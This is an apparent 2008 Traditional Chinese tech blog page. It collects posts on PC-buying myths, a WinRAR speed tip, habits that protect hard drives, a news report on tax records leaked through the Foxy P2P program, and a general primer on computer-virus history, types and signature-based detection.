  在相容性方面,AMD處理器也完全可以令人放心。CPU相容性不佳的問題主要出現在Pentium時代。當時Intel為Pentium處理器配備了MMX指令集,而AMD與Cyrix都是通過授權模式得到MMX技術,因此在部分為MMX最佳化的軟體中出現一些相容性問題。發展到今日,無論是AthlonXP或是Duron,以及即將普及的Athlon64,都不會存在類似問題。

  5400RPM硬碟更加安全





  不可否認,硬碟在諸多PC配件中的穩定性是最差的,頻繁的故障讓很多使用者記憶猶新。為此,不少消費者在選購硬碟時都相當謹慎,甚至點名要求5400RPM的低轉速產品。在很多人的印象中,5400RPM的低轉速硬碟更加安靜,發熱量也大幅度降低,因此壽命理應更長。然而這一說法並不成立。在7200RPM IDE硬碟誕生之初,Seagate的大灰熊系列確實遇到尷尬,但是就此將所有罪過歸結為高轉速是不公平的,進而永遠對高轉速存有偏見更是愚蠢的。

  若果真正瞭解現今的IDE硬碟技術的話,一定會對噪音有更加深刻的認識。轉速並不是決定噪音大小的關鍵因素,通過出色的設計,硬碟廠商已經讓7200RPM的硬碟變得十分安靜,其微小的噪音幾乎被CPU風扇完全遮蓋。而從穩定性來看,7200RPM技術經由幾年的發展之後已經非常成熟,返修率並沒有明顯高於5400RPM的低轉速硬碟。既然72000RPM已經成為市場主流,體現出較大的效能優勢,而且與低轉速硬碟之間的價格差距微乎其微,我們又有什麼理由拒絕呢?

  電源便宜就好





  很多消費者對主板、CPU、顯卡等配件相當在意,而一提到電源等小配件就會不以為然,認為這類技術含量不高的產品只要能用即可。殊不知,電源對於PC穩定執行有著至關重要的影響。

  PC系統中各配件使用的都是低壓直流電,因此電源就是供電的主角,若果把電流比作血液,那麼電源就是電腦的心臟。市電進入電源後,首先經由扼流線圈和電容濾除高頻雜波和干擾信號,接下來經由整流和濾波得到高壓直流電,然後進入電源的開關電路。開關電路主要負責將直流電轉換為高頻脈動直流電,再送高頻開關變壓器降壓,然後濾除高頻交流部分,這樣才得到電腦需要的較為「純淨」的低壓直流電。毫無疑問,一旦電源的質量得不到保證,所有的配件都將在不穩定的電壓下工作,長此以往將對壽命不利。很多硬碟頻繁出現壞道的原因就是電源質量不好,這也是很多使用者所忽視的。也正是看到這一問題,國家頒布了強制執行的3C認證,因此建議大家購買那些有保障的3C認證產品!

  整合主板一定省錢





  整合主板給很多使用者的印象就是省錢,但是這並不是永恆不變的真理。以目前的nForce2 IGP以及I865G為例,其性價比並不高,甚至不如直接選取KT333以及I845E,再配上一款Radeon9200SE。整合主板的價值在於節省投資,而那些價格接近千元的產品顯然讓人難以接受。

  另一種現象便是超低價格的整合主板,不少商家甚至會準備諸如KM266、SiS730、I815E等過時的主板來「對付」要求低價格的使用者。然而當我們真正從性價比角度去分析之後,發現這類整合主板完全不具備優勢。或許多投資200元就能買到獨立顯卡,而此時的效能將完全上一個檔次。

  DDR400記憶體是不二的選取





  DDR400是目前最熱門的記憶體規範,然而真正能夠使用上其全部威力的使用者卻不多。PC部件之間講究協調工作,不然就可能造成投資浪費。以Pentium4平台為例,大多數處理器還停留在533MHz FSB階段,此時即便是DDR400記憶體也只能委曲求全地工作在DDR333模式。AMD平台也不例外,當處理器沒有達到400MHz FSB時,DDR400只是一種擺設。若果配合nForce2晶片群組的話,強行將DDR異步執行於DDR400模式還會降低效能!

  顯然,滿足現實需求才是最重要的。若果不準備使用800MHz FSB的Pentium4以及400MHz FSB的Barton,並且也沒有超頻的打算,那麼完全不必跟風般地追求DDR400。

  超頻會影響穩定性





  超頻是DIY裝機中永恆的話題,但是不少使用者對於超頻一直敬而遠之,生怕會縮短產品壽命。事實上,出於市場策略的原因,AMD與Intel經常將高頻產品當作低端產品來賣,此時進行超頻沒有任何害處,反而能大幅度提高產品的性價比。

  真正的超頻是建立在安全的基礎上,若果能夠讓CPU穩定工作於合理的溫度範圍,並且穩定執行所有的套用程式,那麼即便超頻又何妨呢?

CPU與顯卡失之偏頗

  對於3D遊戲而言,強大的CPU和顯卡都是必不可少的。然而部分消費者由於不瞭解PC架構,因此片面地追求某一方面,結果導致整體效果不佳,反而不能在3D遊戲中獲得令人滿意的效果。事實上,在3D遊戲中,每一個場景的構築都需要顯卡極大的工作量,螢幕上每一個景物都是由顯卡根據圖形透視原理,通過多個三角形的群組合形成的,顯卡既要保證近大遠小的透視效果,還要根據第一視角的位置實現遮擋效果,這裡自然對顯卡的效能有著很大的需求。不過,CPU作為整個系統的中樞神經也有極為重要的地位。CPU在3D遊戲中所起的作用就是對三維場景進行設計,顯卡生成的每一個點都是由CPU規定。此外,CPU還要負責諸如遊戲資料處理等工作,負擔絲毫不亞於顯卡。需要注意的是,如今的顯卡GPU已經具備了相當的處理能力,可以有效減輕CPU的負擔。然而,從另一個角度來看,CPU又可以類比GPU的動作,使兩者之間形成互補。

  毫無疑問,片面地強調CPU或是顯卡的作用都是錯誤的,畢竟兩者是不可分離的有機體。一般應該保證顯卡與CPU的價格差距在600元以內,這樣才不會形成明顯的效能缺陷。

   強求名牌產品與多功能產品

  或許是品牌意識太過強烈,不少消費者在裝機時要求清一色的名牌產品,認為這樣才能保證產品質量。然而應當指出的是,名牌產品並不意味著高效能,中小品牌產品也不等於低質量!在如今產品同質化嚴重的時代,各個廠商之間的產品並沒有很大的效能差異,甚至經常出現同一款OEM產品的現象,此時甚至談不上品牌概念。即便是技術含量相對較高的主板,也不會因為品牌差異而造成巨大的效能差距。對於使用同一款晶片群組的主板而言,其效能差距都是微乎其微的。當然,這裡並非是說名牌產品不好,而且讓大家合理地看到品牌優勢,用自己的頭腦進行性價比分析,做一個理智的消費者。

  關於產品的功能,也存在著一味求全的現象。對於大部分使用者而言,也許如今很多主板的附加功能都是用不上的,如IEEE1394、光纖輸出、千兆網卡等,這無異於是投資浪費。將錢花在刀口上,從自己的實際需求出發,這才是DIY裝機的精髓。

  要預留足夠的升級空間

  為了今後升級方便,裝機時一定要預留足夠的升級空間,甚至寧可多花一點錢,這是很多消費者的普遍心態。誠然,在裝機時考慮到這一點並沒有錯,甚至是應該肯定的。但是若果過分考慮升級空間,你將會因此而得不償失。

  目前PC技術正在高速度發展,接口的轉變往往在一瞬間完成。以Intel為例,Socket 423剛剛推出,Socket 478就將其取代,而今後的Prescott和Dothan處理器甚至已經無法留守Socket 478平台。對於使用者而言,奢望一款主板多次升級CPU已經是不可能的了。與其為了今後的升級而在選購產品時束手束腳,不如徹底將其拋之腦後!

2008年5月5日 星期一

加快WinRAR解壓縮速度

一個小小的秘技

雖然簡單

但是卻很方便唷

與大家分享

加快WinRAR解壓縮速度

1.打開WinRAR程式,點選「選項」->「設定」
2.選擇「路徑」
3.將「放置暫存檔案的資料夾」欄位改成「\」符號

原因是RAR解壓時會先把文件解壓放在「C:\DOCUME~1\ADMINI\LOCALS~1\Temp\」臨時文件夾中,

等解壓結束後再把它們剪貼至所選擇的目的文件夾,所以會耗損一些時間。

防止硬碟早日歸天的秘訣

防止硬碟早日歸天的秘訣

本文要敘述的是會造成硬碟毀滅性故障的錯誤及操作,不是一般的磁碟和系統錯誤,這些故障通常沒有前兆,一旦出現,在BIOS也不能認出硬碟,硬碟資料挽回的可能性極小。

一、在開機和關機的時候突然強行切斷電源

現在的電源及主板的ATX設計,普遍達成了軟關機的功能。這種設計讓人倍感方便。但是軟關機要先完成一系列的關閉正在執行的程式的操作,加上各種作業系統及各主板廠家設計上的相容性、BUG,Windows在進行關閉應用程式然後切斷電源的時候經常會當機,大家可能在很多論壇及報刊的問答專欄,都見過問“為什麼在軟關機的時候當機”的問題 此時硬碟的復位動作很可能還沒完成,如果使用者採用強行切斷電源的做法,硬碟物理受損的可能性很大。

★正確的做法:如果在軟關機時候出現當機,應該是按RESET鍵,讓系統重新進入Windows後,再正式完成關機操作。這樣可能會繁瑣一點,但是能保證硬碟安全地復位,對你上千元的硬碟來說,安全第一啊。

還有就是開機的時候進行的切斷電源:在正常狀態下當然沒人會做這麼無聊的操作,但是當出現一些諸如顯示卡或是記憶體沒插好、螢幕線鬆脫的情況,導致電腦開機無顯示的時候,很多人就只埋頭於搞定目前看到的問題,頻繁的開機、關機,插撥板卡,再開機......而沒留意硬碟在一次次電源的開關下吱吱的呻吟...

尤其是開機沒顯示,只有幾秒鐘的時間,硬碟的初始化動作還沒完成,磁頭正處於敏感位置,一下子被切斷電源停機,然後在不到10秒鐘的情況又受到電流衝擊,發生故障的機率會大大增加。

★正確的做法:先把硬碟的電源線撥掉,你怎麼玩都可以。故障排除後,再接也不遲啊。

二、對硬碟分割區進行的錯誤操作

這的確是新手的錯誤居多了 --- Windows的各種版本造成FAT16、FAT32、NTFS各種格式的存在,不同的任務導致各菜鳥蠢蠢欲動經常想變換硬碟分割區格式、現在GHOST和Partition Magic都能對硬碟分割區進行隨心所欲的操作,以調整硬碟分割區的大小、格式,尤其是後者還具有格式化分區、隱藏硬碟分割區的功能,對熟悉操作的人來說,這些工具是讓人得心應手;但對於新手來說,對分區的操作應該特別謹慎。因為分區的錯誤雖然是軟故障,不是物理故障,但是如果胡亂操作出錯後,在沒有弄懂基本概念的情況下,不假思索地進行“恢復”操作的話,可能會導致分區的引導區和分區表過於混亂無法再被任何工具軟體識別

如果你沒有硬碟分割區表 (Prrtition Table) 和硬碟引導區 (MBR) 資料備份的話,嘿嘿,就只好低階格式化了。低階格式化的工具使用也有個熟練和懂行與否的問題,由於對硬碟分割區進行誤操作導致新硬碟不能再使用的案例,我見過不少。

★建議的措施:無論您是老鳥還是新手,在對硬碟進行敏感操作的時候,備份好分區表和引導區資料,出錯的時候就能隨時正確恢復了。新手最好請個師傅,先帶一帶,熟悉了軟體的介面和指令後再自己操作,畢竟硬碟不同於其他零件,裡面有你的寶貴資料哦。

三、Windows的初始化及使用過程中的危險習慣操作

Windows在初始化的時候,是較為敏感和危險的時刻,如果用戶在啟動組載入了太多的東西,Windows的初始化就會耗費大量時間,也可能會造成當機,尤其是因為害怕病毒而載入了2個以上防火牆、或是線上監控病毒軟體的使用者,各防毒軟體之間的衝突機率很大。

另外,Windows系列提供了用TAB+ALT鍵切換各應用程式的功能,尤其是能在DOS視窗下切換回Windows介面,方便了要在舊的應用程式下工作的使用者。但是因為DOS是單線程的作業系統,其應用程式也是以這種線程的設計,所以DOS的應用程式對CPU的佔用率較大,因為DOS老結構的問題,程式的反應也沒Windows程式快,所以在進行Windows的DOS視窗操作的時候,建議使用者的動作不要那麼快,以免系統響應不及造成當機;另外,使用TAB+ALT切換的時候也應該謹慎,不要在程式還沒完成目前的任務就強行切換,造成當機。

Windows中的錯誤,本來不會直接造成硬碟的物理損壞。但是這些是屬於使用習慣的問題,一兩次無所謂,天長日久,頻繁的當機和重新啟動電腦,對硬碟乃至電腦的各個零件的衝擊積累起來是相當有害的;而且頻繁當機容易造成人的心理急躁,可能會在電腦重新啟動完成前就賭氣關機,也就是出現第一種類型的致命故障的可能性。 還有就是各種各樣不退出Windows程式就隨手關機、長期不整理硬碟和不運行磁碟掃描程式(在一些公用的電腦最常見)等等的不良習慣,都可能會埋下硬碟毀滅的根源。

★建議的措施:這些都是基本的東西,注意改變使用習慣就是,例如線上防毒軟體,掛一個即可,可以定期變換其他的,但同時後台執行的不適宜太多。其他標準正確的操作在很多經驗文章中都有提到,此處不多說了。

四、其他各類非常規錯誤

例如資料線插反、劣質的電源導致的損壞、板卡的短路等等,在各類報刊網站有很多案例,此處不一一列舉了,自己注意就是。

總結:

上面所說的硬碟大敵,不一定是如此操作就馬上出現故障,但是存在相當高的損壞機率,你今天還玩遊戲上網好好的,隨手關機後,明天沒有任何提示,系統找不到硬碟了。

網路報稅 500萬個資恐不保FOXY下載隨手可得 官員驚呼:怎麼會

以下是今日一則來自蘋果的報導

看了不禁讓人擔憂

至剛剛為止

本人至FOXY做搜尋測試

依然使用"申報資料"作為關鍵字可搜尋上百筆個人報稅資料

此現象再次告訴了我們網路的安全問題

除了安裝防毒軟體及防火牆位我們把關

更重要的是告人的使用習慣

儘管FOXY方便好用

但帶來的副作用絕對是不值得的

一首歌值幾塊錢?你的個人資料又值幾塊錢?

給本站讀者以下幾個建議

可避免類似情形發生

1.安裝防毒&防火牆軟體

2.定期更新作業系統安全漏洞修補程式

3.P2P分享類軟體不用

4.奇怪郵件不開.危險網站不上.不用來路不明的程式

使用電腦時

請遵守以上四大要點

避免陷自己於危險中!!


-------------------------------------------------------------------------------

網路報稅 500萬個資恐不保FOXY下載隨手可得 官員驚呼:怎麼會

2008-05-05

【楊雅靜、洪哲政╱台北報導】時值納稅人繳納所得稅熱季,一名納稅人日前在分享軟體FOXY搜尋報稅資料時,意外發現大批的納稅人報稅資料可供人下載,其中一筆竟是朋友的資料!《蘋果》昨調查後,發現納稅人的身分證統一編號、地址、收入等資料,竟然可以輕鬆取得,全國五百多萬申報戶的個資也令人堪慮;財政部賦稅署官員聞訊後大呼:「怎麼會有這種事?」今將著手調查。

嚴重漏洞

財政部為了簡化納稅人申報所得稅流程,近年不斷推動網路報稅,去年網路申報有兩百四十五萬多件,佔總申報件數的百分之四十七,今年件數可望過半,不過在知名的點對點(P2P)分享軟體FOXY,卻發現連續三年、近百筆的申報資料,供人瀏覽點閱、下載,網路報稅安全出現嚴重漏洞。

個資所得一覽無遺

家住北縣的王姓男子指出,日前他在FOXY輸入「申報資料」四字搜尋,想搜尋報稅的相關軟體,「沒想到竟看到網站跑出一大串民眾個人網路報稅資料,名單資料多達數十人,連朋友的報稅資料也在上面。」他驚訝地說,下載名單中有許多民眾今年的報稅資料,「報稅剛開始,就有網路報稅資料流出,實在太可怕。」

《蘋果》依照王男說法在電腦操作,果然在FOXY查到民眾申報資料,接著從財政部電子申報繳稅服務網下載報稅程式,沒想到,竟真的開啟納稅人的報稅資料,包括納稅人的住址、身分證統一編號、電話住址、所得、家中人數等資訊,全都一覽無遺。

《蘋果》依該批網路報稅的外洩資料,抽樣致電給家住新竹的李月玲查證,李婦接到電話後,一度以為是詐騙集團電話,直到記者將取得個資與她進行比對,她驚訝地直呼:「怎會這樣?」李婦表示,她的確是用網路申報綜合所得稅,也曾聽過「FOXY」,「但家中並未安裝,不知道竟然在網路上公開流傳。」自行查證後會向警方報案。

1111人力銀行之前曾針對網路報稅一事進行市場調查,當時有六成四的上班族憂心網路報稅會導致資料外洩,沒想到竟然噩夢成真。

財政部將進行清查

財政部賦稅署簡任稽核許文智受訪後才知此事,他也很訝異:「這不對啊!怎麼會有這種事?」他強調,該署作業應不會有「公務家辦」的狀況,要查詢個人報稅資料,都必須輸入登記有案且受國稅局控管的帳號,才能做「個人」資料的查詢,對於納稅人網路報稅的資料在網上流傳,他強調會進行清查。

隨手可得

在FOXY輸入「申報資料」,赫然發現近百筆民眾報稅資料。

個資全有
將下載資料輸入電子報稅系統,竟出現民眾的詳細個資。

所得曝光
就連民眾的所得資料都能輕鬆點閱,網路報稅安全有嚴重漏洞。

FOXY分享軟體小檔案
軟體功能:網路點對點(P2P)資源分享
最新版本:1.9.7
網址:tw.gofoxy.net
潛在風險:即使指定分享目錄仍開放所有的目錄供使用者尋找檔案
法律責任:若分享或下載未經授權資料,例如音樂或影片,將違《著作權法》,處3年以下有期徒刑,得併科75萬元以下罰金
資料來源:刑事局、《蘋果》資料室

網路報稅注意事項
.不要在公用電腦或無防火牆的電腦上報稅。
.勿下載非官方報稅軟體
.勿委託他人代為電腦報稅。
.使用前先更新病毒碼、進行掃毒。
.移除電腦裡的共享或免費軟體,以防個人資料外洩。
.報稅後可至電子報稅系統(tax.nat.gov.tw)查詢資料上傳情形。
資料來源:刑事局偵九隊、《蘋果》資料室

電腦病毒小知識速查系列

電腦病毒的故事
電腦病毒小知識速查系列一

電腦病毒的定義
電腦病毒(Computer Virus)在 《中華人民共和國電腦訊息系統安全保護條例》中被明確定義為:"指編製或是在電腦程式中插入的破壞電腦功能或是破壞資料,影響電腦使用並且能夠自我複製的一群組電腦指令或是程式代碼"。

電腦病毒的特點

人為的特製程式,具有自我複製能力,很強的感染性,一定的潛伏性,特定的觸發性,很大的破壞性。

病毒存在的必然性

電腦的訊息需要存取,複製,傳輸,病毒作為訊息的一種形式可以隨之繁殖,感染,破壞.並且,當病毒取得控制權之後,他們會主動尋找感染目的,使自己廣為流傳。

電腦病毒的長期性

電腦動作系統的弱點往往是被病毒利用,提高系統的安全性是防病毒的一個重要方面,但完美的系統是不存在的。提高一定的安全性將使系統多數時間用於病毒檢查,系統失去了可用性與實用性,另一方面,訊息保密的要求讓人在洩密和抓住病毒之間無法選取。

這樣,病毒與反病毒將成為一個長期的技術對抗。病毒主要由反病毒軟體來對付,而且反病毒技術將成為一種長期的科研做下去。

電腦病毒的產生

病毒不是來源於突發或偶然的原因。

突發的停電和偶然的錯誤,會在電腦的磁碟和記憶體中產生一些亂碼和隨機指令,但這些代碼是無序和混亂的。病毒則是一種比較完美的,精巧嚴謹的代碼,按照嚴格的秩序群組織起來,與所在的系統網路環境相適應和配合起來,病毒不會通過偶然形成,並且需要有一定的長度,這個基本的長度從概率上來講是不可能通過隨機代碼產生的。

病毒是人為的特製程式

現在流行的病毒是由人為故意編寫的,多數病毒可以找到作者訊息和產地訊息,通過大量的資料分析統計來看,病毒作者主要情況和目的是:一些天才的程式員為了表現自己和證明自己的能力,處於對上司的不滿,為了好奇,為了報復,為了祝賀和求愛,為了得到控制密碼,為了軟體拿不到報酬預留的陷阱等。當然也有因政治,軍事,宗教,民族。專利等方面的需求而專門編寫的,其中也內含一些病毒研究機構和黑客的測試病毒。

電腦病毒小知識速查系列二

   >
電腦病毒分類

根據多年對電腦病毒的研究,按照科學的,系統的,嚴密的方法,電腦病毒可分類如下:
按照電腦病毒屬性的分類

1、病毒存在的媒體

根據病毒存在的媒體,病毒可以劃分為網路病毒,檔案病毒,引導型病毒。
網路病毒通過電腦網路傳播感染網路中的可執行檔案,檔案病毒感染電腦中的檔案(如:COM,EXE,DOC等),引導型病毒感染啟動扇區(Boot)和硬碟的系統引導扇區(MBR),還有這三種情況的混合型,例如:多型病毒(檔案和引導型)感染檔案和引導扇區兩種目的,這樣的病毒通常都具有複雜的算法,它們使用非常規的辦法侵入系統,同時使用了加密和變形算法。

2、病毒傳染的方法

3、病毒破壞的能力

根據病毒破壞的能力可劃分為以下幾種:
無害型:除了傳染時減少磁碟的可用空間外,對系統沒有其它影響。
無危險型:這類病毒僅僅是減少記憶體、顯示圖像、發出音效及同類音響。
危險型:這類病毒在電腦系統動作中造成嚴重的錯誤。
非常危險型:這類病毒移除程式、破壞資料、清除系統記憶體區和動作系統中重要的訊息。
這些病毒對系統造成的危害,並不是本身的算法中存在危險的呼叫,而是當它們傳染時會引起無法預料的和災難性的破壞。由病毒引起其它的程式產生的錯誤也會破壞檔案和扇區,這些病毒也按照他們引起的破壞能力劃分。一些現在的無害型病毒也可能會對新版的DOS、Windows和其它動作系統造成破壞。例如:在早期的病毒中,有一個"Denzuk"病毒在360K磁碟上很好的工作,不會造成任何破壞,但是在後來的高密度軟碟上卻能引起大量的資料丟失。

4、病毒特有的算法

根據病毒特有的算法,病毒可以劃分為:
伴隨型病毒:這一類病毒並不改變檔案本身,它們根據算法產生EXE檔案的伴隨體,具有同樣的名字和不同的副檔名(COM),例如:XCOPY.EXE的伴隨體是XCOPY.COM。病毒把自身寫入COM檔案並不改變EXE檔案,當DOS加載檔案時,伴隨體優先被執行到,再由伴隨體加載執行原來的EXE檔案。
"蠕蟲"型病毒:通過電腦網路傳播,不改變檔案和資料訊息,利用網路從一台機器的記憶體傳播到其它機器的記憶體,計算網路位址,將自身的病毒通過網路傳送。有時它們在系統存在,一般除了記憶體不佔用其它資源。
寄生型病毒:除了伴隨和"蠕蟲"型,其它病毒均可稱為寄生型病毒,它們依附在系統的引導扇區或檔案中,通過系統的功能進行傳播,按算法分為:
練習型病毒:病毒自身包括錯誤,不能進行很好的傳播,例如一些病毒在除錯階段。
詭秘型病毒:它們一般不直接修改DOS中斷和扇區資料,而是通過裝置技術和檔案緩沖區等DOS內定修改,不易看到資源,使用比較進階的技術。利用DOS閒置的資料區進行工作。
變型病毒(又稱幽靈病毒):這一類病毒使用一個複雜的算法,使自己每傳播一份都具有不同的內容和長度。它們一般的作法是一段混有無關指令的解碼算法和被變化過的病毒體群組成。


電腦病毒小知識速查系列三

   >
電腦病毒的發展

在病毒的發展史上,病毒的出現是有規律的,一般情況下一種新的病毒技術出現後,病毒迅速發展,接著反病毒技術的發展會抑制其流傳。動作系統進行升級時,病毒也會調整為新的模式,產生新的病毒技術。它可劃分為:

1、DOS引導階段
1987年,電腦病毒主要是引導型病毒,具有代表性的是"小球"和"石頭"病毒。
當時得電腦硬體較少,功能簡單,一般需要通過軟碟啟動後使用。引導型病毒利用軟碟得啟動原理工作,它們修改系統啟動扇區,在電腦啟動時首先取得控制權,減少系統記憶體,修改磁碟讀寫中斷,影響系統工作效率,在系統存取磁碟時進行傳播。1989年,引導型病毒發展為可以感染硬碟,典型的代表有"石頭2"。

2、DOS可執行階段
1989年,可執行檔案型病毒出現,它們利用DOS系統加載執行檔案的機制工作,代表為"耶路撒冷","星期天"病毒,病毒代碼在系統執行檔案時取得控制權,修改DOS中斷,在系統呼叫時進行傳染,並將自己附加在可執行檔案中,使檔案長度增加。1990年,發展為復合型病毒,可感染COM和EXE檔案。

3、伴隨、批次型階段
1992年,伴隨型病毒出現,它們利用DOS加載檔案的優先順序進行工作。具有代表性的是"金蟬"病毒,它感染EXE檔案時生成一個和EXE同名的副檔名為COM伴隨體;它感染COM檔案時,改為原來的COM檔案為同名的EXE檔案,在產生一個原名的伴隨體,檔案副檔名為COM。這樣,在DOS加載檔案時,病毒就取得控制權。這類病毒的特點是不改變原來的檔案內容,日期及屬性,解除病毒時只要將其伴隨體移除即可。在非DOS動作系統中,一些伴隨型病毒利用動作系統的描述語系進行工作,具有典型代表的是"海盜旗"病毒,它在得到執行時,詢問使用者名稱和密碼,然後返回一個出錯訊息,將自身移除。批次型病毒是工作在DOS下的和"海盜旗"病毒類似的一類病毒。

4、幽靈、多形階段
1994年,隨著彙編語系的發展,實現同一功能可以用不同的模式進行完成,這些模式的群組合使一段看似隨機的代碼產生相同的運算結果。幽靈病毒就是利用這個特點,每感染一次就產生不同的代碼。例如"一半"病毒就是產生一段有上億種可能的解碼運算程式,病毒體被隱藏在解碼前的資料中,查解這類病毒就必須能對這段資料進行解碼,加大了查毒的難度。多形型病毒是一種綜合性病毒,它既能感染引導區又能感染程式區,多數具有解碼算法,一種病毒往往要兩段以上的子程式方能解除。

5、生成器、變體機階段
1995年,在彙編語系中,一些資料的運算放在不同的通用寄存器中,可運算出同樣的結果,隨機的插入一些空動作和無關指令,也不影響運算的結果,這樣,一段解碼算法就可以由生成器生成。當生成的是病毒時,這種複雜的稱之為病毒生成器和變體機就產生了。具有典型代表的是"病毒製造機"VCL,它可以在瞬間製造出成千上萬種不同的病毒,查解時就不能使用傳統的特徵識別法,需要在巨集觀上分析指令,解碼後查解病毒。變體機就是增加解碼複雜程度的指令生成機制。

6、網路、蠕蟲階段
1995年,隨著網路的普及,病毒開始利用網路進行傳播,它們只是以上幾代病毒的改進。在非DOS動作系統中,"蠕蟲"是典型的代表,它不佔用除記憶體以外的任何資源,不修改磁碟檔案,利用網路功能搜尋網路位址,將自身向下一位址進行傳播,有時也在網路伺服器和啟動檔案中存在。

7、視窗階段
1996年,隨著Windows和Windows95的日益普及,利用Windows進行工作的病毒開始發展,它們修改(NE,PE)檔案,典型的代表是DS.3873,這類病毒的急智更為複雜,它們利用保護模式和API呼叫接口工作,解除方法也比較複雜。

8、巨集病毒階段
1996年,隨著Windows Word功能的增強,使用Word巨集語系也可以編製病毒,這種病毒使用類Basic語系,編寫容易,感染Word文件檔案。在Excel和AmiPro出現的相同工作機制的病毒也歸為此類。由於Word文件格式沒有公開,這類病毒查解比較困難。

9、互連網階段
1997年,隨著因特網的發展,各種病毒也開始利用因特網進行傳播,一些攜帶病毒的封包和信件越來越多,若果不小心開啟了這些信件,機器就有可能中毒。

10 Java、信件炸彈階段
1997年,隨著萬維網上Java的普及,利用Java語系進行傳播和資料取得的病毒開始出現,典型的代表是JavaSnake病毒。還有一些利用信件伺服器進行傳播和破壞的病毒,例如Mail-Bomb病毒,它就嚴重影響因特網的效率。

電腦病毒小知識速查系列四

電腦病毒的危害性

1988年11月2日下午5時1分59秒,美國康奈爾大學的電腦科學系研究生,23歲的莫裡斯(Morris)將其編寫的蠕蟲程式輸入電腦網路。在幾小時內導致因特網堵塞。這個網路連線著大學、研究機關的155000台電腦,使網路堵塞,執行遲緩。這件事就像是電腦界的一次大地震,引起了巨大反響,震驚全世界,引起了人們對電腦病毒的恐慌,也使更多的電腦專家重視和致力於電腦病毒研究。1988年下半年,我國在統計局系統首次發現了"小球"病毒,它對統計系統影響極大。最近的CIH病毒,美麗殺病毒等等都在全世界範圍內造成了很大的經濟和社會損失。

可以看到,隨著電腦和因特網的日益普及,電腦病毒和崩潰,重要資料遭到破壞和丟失,會造成社會財富的巨大浪費,甚至會造成全人類的災難。

國內外防毒行業發展

隨著電腦技術發展得越來越快,使得電腦病毒技術與電腦反病毒技術的對抗也越來越尖銳。據統計,現在基本上每天都要出現幾十種新病毒,其中很多病毒的破壞性都非常大,稍有不慎,就會給電腦使用者造成嚴重後果。下面我們以介紹國內防毒行業的發展為主。

我國電腦反病毒技術的研究和發展,是從研製防病毒卡開始的。防病毒卡的核心實際上是一個軟體,只不過將其固化在ROM中。它的出發點是想以不變應萬變,通過動態駐留記憶體來監視電腦的執行情況,根據總結出來的病毒行為規則和經驗來判斷是否有病毒活動,通過截獲中斷控制權規則和經驗來判定是否有病毒活動,並可以截獲中斷控制權來使記憶體中的病毒癱瘓,使其失去傳染別的檔案和破壞訊息資料的能力,這就是防病毒卡"帶毒執行"功能的基本原理。防病毒卡主要的不足是與標準軟體特別是國產的軟體有不相容的現象,誤報、漏報病毒現象時有發生,降低了電腦執行速度,升級困難等。從防病毒技術上說是不成熟的,病毒知變萬化,技術手段越來越高,企圖以一種不變的技術對付病毒是不可能的。防病毒卡的動態監測技術、病毒行為規則的研究,對於發現電腦病毒起了很大的作用,這些技術是防病毒卡換精華。但是作為一個產品,只有這部分技術是遠遠不夠的,這部分技術也沒有太大的實際意義,所以防病毒卡的使用者在減少。

隨著防病毒卡的衰落,解病毒軟體則日益風行。解病毒軟體最重要的功能是將病毒徹底乾淨地予以清除,若果說防病毒卡是治標的話,那麼解病毒軟體則是治本。

第一代反病毒技術是採取單純的病毒特徵判斷,將病毒從帶毒檔案中清除掉。這種模式可以準確地清除病毒,可靠性很高。後來病毒技術發展了,特別是加密和變形技術的運用,使得這種簡單的靜態掃瞄模式失去了作用。隨之而來的反病毒技術也發展了一步。

第二代反病毒技術是採用靜態廣譜特徵掃瞄方法檢驗病毒,這種模式可以更多地檢驗出變形病毒,但另一方面誤報率也提高,尤其是用這種不嚴格的特徵判定模式去清除病毒帶來的風險性很大,容易造成檔案和資料的破壞。所以說靜態防病毒技術也有難以克服的缺陷。

第三代反病毒技術的主要特點是將靜態掃瞄技術和動態模擬追蹤技術結合起來,將尋找病毒和清除病毒合二為一,形成一個整體解決專案,能夠全面實現防、查、消等反病毒所必備的各種手段,以駐留記憶體模式防止病毒的入侵,凡是檢驗到的病毒都能清除,不會破壞檔案和資料。隨著病毒數量的增加和新型病毒技術的發展,靜態掃瞄技術將會使查毒軟體速度降低,駐留記憶體防毒模組容易產生誤報。

第四代反病毒技術則是針對電腦病毒的發展而基於病毒家族體系的命名規則、基於多位CRC校驗和掃瞄機理,啟髮式智慧代碼分析模組、動態資料復原模組(能查出隱蔽性極強的壓縮加密檔案中的病毒)、記憶體解毒模組、自身免疫模組等先進的解毒技術,較好的解決了以前防毒技術顧此失彼、此消彼長的狀態。

電腦病毒小知識速查系列五

病毒檢驗的方法

在與病毒的對抗中,及早發現病毒很重要。早發現,早處置,可以減少損失。檢驗病毒方法有:特徵代碼法、校驗和法、行為監測法、軟體類比法, 這些方法依據的原理不同,實現時所需開銷不同,檢驗範圍不同,各有所長。

特徵代碼法
特徵代碼法被早期套用於SCAN、CPAV等著名病毒檢驗工具中。國外專家認為特徵代碼法是檢驗已知病毒的最簡單、開銷最小的方法。

特徵代碼法的實現步驟如下:
採集已知病毒樣本,病毒若果既感染COM檔案,又感染EXE檔案,對這種病毒要同時採集COM型病毒樣本和EXE型病毒樣本。
在病毒樣本中,抽取特徵代碼。依據如下原則:
抽取的代碼比較特殊,不大可能與普通標準程式代碼吻合。抽取的代碼要有適當長度,一方面維持特徵代碼的唯一性,另一方面又不要有太大的空間與時間的開銷。若果一種病毒的特徵代碼增長一位元組,要檢驗3000種病毒,增加的空間就是3000位元組。在保持唯一性的前提下,盡量使特徵代碼長度短些,以減少空間與時間開銷。
在既感染COM檔案又感染EXE檔案的病毒樣本中,要抽取兩種樣本共有的代碼。將特徵代碼納入病毒資料庫。
開啟被檢驗檔案,在檔案中搜尋,檢查檔案中是否含有病毒資料庫中的病毒特徵代碼。若果發現病毒特徵代碼,由於特徵代碼與病毒一一對應,便可以斷定,被查檔案中患有何種病毒。
採用病毒特徵代碼法的檢驗工具,面對不斷出現的新病毒,必須不斷更新版本,否則檢驗工具便會老化,逐漸失去實用價值。病毒特徵代碼法對從未見過的新病毒,自然無法知道其特徵代碼,因而無法去檢驗這些新病毒。

特徵代碼法的優點是:檢驗準確快速、可識別病毒的名稱、誤報警率低、依據檢驗結果,可做解毒處理。其缺點是:不能檢驗不詳病毒、搜集已知病毒的特徵代碼,費用開銷大、在網路上效率低(在網路伺服器上,因長時間檢索會使整個網路效能變壞)。
其特點:
